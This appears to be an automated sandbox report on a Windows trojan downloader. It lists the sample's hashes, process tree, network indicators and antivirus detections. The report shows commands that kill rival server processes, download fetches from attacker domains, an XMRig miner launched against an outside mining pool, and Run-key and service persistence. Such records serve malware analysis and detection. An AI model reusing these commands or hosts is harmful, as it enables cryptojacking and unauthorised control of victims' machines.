Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 5, 2021, 4:41 p.m.	Sept. 5, 2021, 4:45 p.m.

Size	567.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`0fa802e8a7eafd690f71460f97be0140`
SHA256	`df787884cb15802a125a3aab9b0e15c55952db0b8825814cc8e7ddde24249ad1`
CRC32	`47CD38A6`
ssdeep	`12288:wAc9dbM4F1Gtsra204wDOs8t1VMa7V8ceU6/IEzkNwRyZ8FuTyCtN8wtIy:BKdbM4F1GtseJTKGceU6/I/wRj9gL`
PDB Path	D:\svchost - å¯æ¬\Release\svchost.pdb
Yara	PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library IsPE32 - (no description)

httpd.exe "C:\Users\test22\AppData\Local\Temp\httpd.exe"
540
- cmd.exe "C:\Windows\System32\cmd.exe" TASKKILL / F / IM httpd.exe
  1836
- cmd.exe "C:\Windows\System32\cmd.exe" ntsd - c q - pn httpd.exe
  596
- cmd.exe "C:\Windows\System32\cmd.exe" TASKKILL /F /IM FileZilla_Server.exe
  2856
- cmd.exe "C:\Windows\System32\cmd.exe" ntsd - c q - pn FileZilla_Server.exe
  2092
- cmd.exe "C:\Windows\System32\cmd.exe" TASKKILL /F /IM redis-server.exe
  2060
- cmd.exe "C:\Windows\System32\cmd.exe" ntsd - c q - pn redis-server.exe
  1852
- cmd.exe "C:\Windows\System32\cmd.exe" TASKKILL /F /IM node.exe
  2692
- cmd.exe "C:\Windows\System32\cmd.exe" ntsd - c q - pn node.exe
  2768
- cmd.exe "C:\Windows\System32\cmd.exe" TASKKILL /F /IM cmd.exe
  2384
- httpd.exe "C:\Windows\httpd.exe"
  804
  - redis-server.exe "C:\Users\test22\AppData\Local\Temp\redis-server.exe" -o pool.fuck-jp.ru:8888
    2952

Name	Response	Post-Analysis Lookup
down.fuck-jp.ru	A 104.21.5.45 A 172.67.132.245	104.21.5.45
api.fuck-jp.ru	A 104.21.5.45 A 172.67.132.245	172.67.132.245
pool.fuck-jp.ru	A 185.144.31.44	185.144.31.44

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.132.245	Active	Moloch
185.144.31.44	Active	Moloch
45.147.228.207	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 172.67.132.245:80 -> 192.168.56.101:49213	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.101:49218 -> 185.144.31.44:8888	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.101:49221 -> 185.144.31.44:8888	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.101:49217 -> 185.144.31.44:8888	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.101:49223 -> 185.144.31.44:8888	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.101:49222 -> 185.144.31.44:8888	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA Sept. 5, 2021, 4:41 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 5, 2021, 4:41 p.m.			0	0

Command line console output was observed (50 out of 75 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Microsoft Windows [Version 6.1.7601] console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Microsoft Windows [Version 6.1.7601] console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Microsoft Windows [Version 6.1.7601] console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Microsoft Windows [Version 6.1.7601] console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Microsoft Windows [Version 6.1.7601] console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Microsoft Windows [Version 6.1.7601] console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Microsoft Windows [Version 6.1.7601] console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Microsoft Windows [Version 6.1.7601] console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Microsoft Windows [Version 6.1.7601] console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: Huge pages support was successfully enabled, but reboot required to use it console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: ABOUT console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: XMRig/6.15.0 console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: gcc/10.3.0 console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: LIBS libuv/1.41.0 OpenSSL/1.1.1j hwloc/2.4.1 console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: HUGE PAGES console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: unavailable console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: 1GB PAGES console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: unavailable console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: CPU Intel(R) Core(TM) i5-8400 CPU @ 2.80GHz (1) console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: 64-bit console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: AES console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: VM console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: L2: console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: 0.5 MB console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: L3: console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: 18.0 MB console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: C console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: T console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: NUMA: console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: MEMORY console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: GB console_handle: 0x0000000000000013	1	1
WriteConsoleW Sept. 5, 2021, 4:41 p.m.	buffer: MOTHERBOARD console_handle: 0x0000000000000013	1	1

This executable has a PDB path (1 event)

pdb_path

D:\svchost - å¯æ¬\Release\svchost.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 5, 2021, 4:41 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (3 events)

request	GET http://api.fuck-jp.ru/url64.txt
request	GET http://api.fuck-jp.ru/run64.txt
request	GET http://down.fuck-jp.ru/redis-server.exe

Resolves a suspicious Top Level Domain (TLD) (3 events)

domain	down.fuck-jp.ru	description	Russian Federation domain TLD
domain	pool.fuck-jp.ru	description	Russian Federation domain TLD
domain	api.fuck-jp.ru	description	Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 5, 2021, 4:41 p.m.	process_identifier: 2952 region_size: 131072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001db0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1	0	0

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Sept. 5, 2021, 4:41 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 13709033472 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ total_number_of_bytes: 0	1	1	0

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\redis-server.exe

Creates a suspicious process (10 events)

cmdline	"C:\Windows\System32\cmd.exe" TASKKILL /F /IM cmd.exe
cmdline	"C:\Windows\System32\cmd.exe" TASKKILL /F /IM redis-server.exe
cmdline	"C:\Windows\System32\cmd.exe" TASKKILL /F /IM FileZilla_Server.exe
cmdline	cmd TASKKILL /F /IM cmd.exe
cmdline	"C:\Windows\System32\cmd.exe" ntsd - c q - pn redis-server.exe
cmdline	"C:\Windows\System32\cmd.exe" TASKKILL / F / IM httpd.exe
cmdline	"C:\Windows\System32\cmd.exe" ntsd - c q - pn httpd.exe
cmdline	"C:\Windows\System32\cmd.exe" TASKKILL /F /IM node.exe
cmdline	"C:\Windows\System32\cmd.exe" ntsd - c q - pn node.exe
cmdline	"C:\Windows\System32\cmd.exe" ntsd - c q - pn FileZilla_Server.exe

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\redis-server.exe

A process created a hidden window (11 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 5, 2021, 4:41 p.m.	show_type: 0 filepath_r: cmd parameters: TASKKILL / F / IM httpd.exe filepath: cmd	1	1
ShellExecuteExW Sept. 5, 2021, 4:41 p.m.	show_type: 0 filepath_r: cmd parameters: ntsd - c q - pn httpd.exe filepath: cmd	1	1
ShellExecuteExW Sept. 5, 2021, 4:41 p.m.	show_type: 0 filepath_r: cmd parameters: TASKKILL /F /IM FileZilla_Server.exe filepath: cmd	1	1
ShellExecuteExW Sept. 5, 2021, 4:41 p.m.	show_type: 0 filepath_r: cmd parameters: ntsd - c q - pn FileZilla_Server.exe filepath: cmd	1	1
ShellExecuteExW Sept. 5, 2021, 4:41 p.m.	show_type: 0 filepath_r: cmd parameters: TASKKILL /F /IM redis-server.exe filepath: cmd	1	1
ShellExecuteExW Sept. 5, 2021, 4:41 p.m.	show_type: 0 filepath_r: cmd parameters: ntsd - c q - pn redis-server.exe filepath: cmd	1	1
ShellExecuteExW Sept. 5, 2021, 4:41 p.m.	show_type: 0 filepath_r: cmd parameters: TASKKILL /F /IM node.exe filepath: cmd	1	1
ShellExecuteExW Sept. 5, 2021, 4:41 p.m.	show_type: 0 filepath_r: cmd parameters: ntsd - c q - pn node.exe filepath: cmd	1	1
ShellExecuteExW Sept. 5, 2021, 4:41 p.m.	show_type: 0 filepath_r: cmd parameters: TASKKILL /F /IM cmd.exe filepath: cmd	1	1
ShellExecuteExW Sept. 5, 2021, 4:41 p.m.	show_type: 0 filepath_r: C:\Windows\httpd.exe parameters: filepath: C:\Windows\httpd.exe	1	1
ShellExecuteExW Sept. 5, 2021, 4:41 p.m.	show_type: 0 filepath_r: redis-server.exe parameters: -o pool.fuck-jp.ru:8888 filepath: redis-server.exe	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 5, 2021, 4:41 p.m.	flags: 14 family: 0		111	0

An executable file was downloaded by the process httpd.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Sept. 5, 2021, 4:41 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd/að. request_handle: 0x00cc000c	1	1	0

Potentially malicious URLs were found in the process memory dump (8 events)

url	http://down.fuck-jp.ru/hh.exe
url	http://api.fuck-jp.ru/run64.txt
url	http://api.fuck-jp.ru/url64.txt
url	https://L
url	https://xmrig.com/wizard
url	https://xmrig.com/benchmark/%s
url	https://xmrig.com/docs/algorithms
url	https://H

Yara rule detected in process memory (26 events)

description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Perform crypto currency mining	rule	BitCoin
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (10 events)

cmdline	cmd TASKKILL / F / IM httpd.exe
cmdline	"C:\Windows\System32\cmd.exe" TASKKILL /F /IM cmd.exe
cmdline	"C:\Windows\System32\cmd.exe" TASKKILL /F /IM redis-server.exe
cmdline	"C:\Windows\System32\cmd.exe" TASKKILL /F /IM FileZilla_Server.exe
cmdline	cmd TASKKILL /F /IM node.exe
cmdline	cmd TASKKILL /F /IM FileZilla_Server.exe
cmdline	cmd TASKKILL /F /IM redis-server.exe
cmdline	cmd TASKKILL /F /IM cmd.exe
cmdline	"C:\Windows\System32\cmd.exe" TASKKILL / F / IM httpd.exe
cmdline	"C:\Windows\System32\cmd.exe" TASKKILL /F /IM node.exe

Communicates with host for which no DNS query was performed (1 event)

host

45.147.228.207

Installs itself for autorun at Windows startup (3 events)

service_name	cellinst	service_path	C:\Windows\httpd.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\cellinst.exe	reg_value	C:\Windows\httpd.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\cellinst.exe	reg_value	C:\Windows\httpd.exe

Created a service where a service was also not started (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceA Sept. 5, 2021, 4:41 p.m.	service_start_name: start_type: 2 password: display_name: cellinst filepath: C:\Windows\httpd.exe service_name: cellinst filepath_r: C:\Windows\httpd.exe desired_access: 983551 service_handle: 0x006f5d60 error_control: 1 service_type: 272 service_manager_handle: 0x006f5e00	1	7298400	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 540 resumed a thread in remote process 804
Process injection	Process 804 resumed a thread in remote process 2952
NtResumeThread Sept. 5, 2021, 4:41 p.m.	thread_handle: 0x00000174 suspend_count: 1 process_identifier: 804	1	0	0
NtResumeThread Sept. 5, 2021, 4:41 p.m.	thread_handle: 0x0000044c suspend_count: 1 process_identifier: 2952	1	0	0

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Sept. 5, 2021, 4:41 p.m.	information_class: 76 (SystemFirmwareTableInformation)		-1073741789	0

File has been identified by 33 AntiVirus engines on VirusTotal as malicious (33 events)

MicroWorld-eScan	Gen:Heur.Mint.Zard.30
FireEye	Gen:Heur.Mint.Zard.30
McAfee	RDN/Generic Downloader.x
Cylance	Unsafe
Alibaba	TrojanDownloader:Win32/Generic.90ddc0a6
K7GW	Trojan-Downloader ( 0057c0481 )
Cybereason	malicious.8a7eaf
BitDefenderTheta	Gen:NN.ZexaF.34126.JuW@aKdFqNci
ESET-NOD32	Win32/TrojanDownloader.Agent.FQR
Paloalto	generic.ml
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Gen:Heur.Mint.Zard.30
Avast	Win32:Malware-gen
Tencent	Win32.Trojan.Generic.Jmm
Ad-Aware	Gen:Heur.Mint.Zard.30
Sophos	Mal/Generic-S
VIPRE	Trojan.Win32.Generic!BT
McAfee-GW-Edition	RDN/Generic Downloader.x
SentinelOne	Static AI - Suspicious PE
Emsisoft	Gen:Heur.Mint.Zard.30 (B)
APEX	Malicious
Webroot	W32.Gen.BT
Avira	TR/Dldr.Agent.gfejo
Microsoft	Trojan:Win32/Tnega!ml
GData	Gen:Heur.Mint.Zard.30
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Generic.C4580956
VBA32	BScope.Trojan.Glupteba
MAX	malware (ai score=86)
Ikarus	Gen.Mint.Zard
Fortinet	W32/Malicious_Behavior.VEX
AVG	Win32:Malware-gen
MaxSecure	Trojan.Malware.300983.susgen

httpd.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All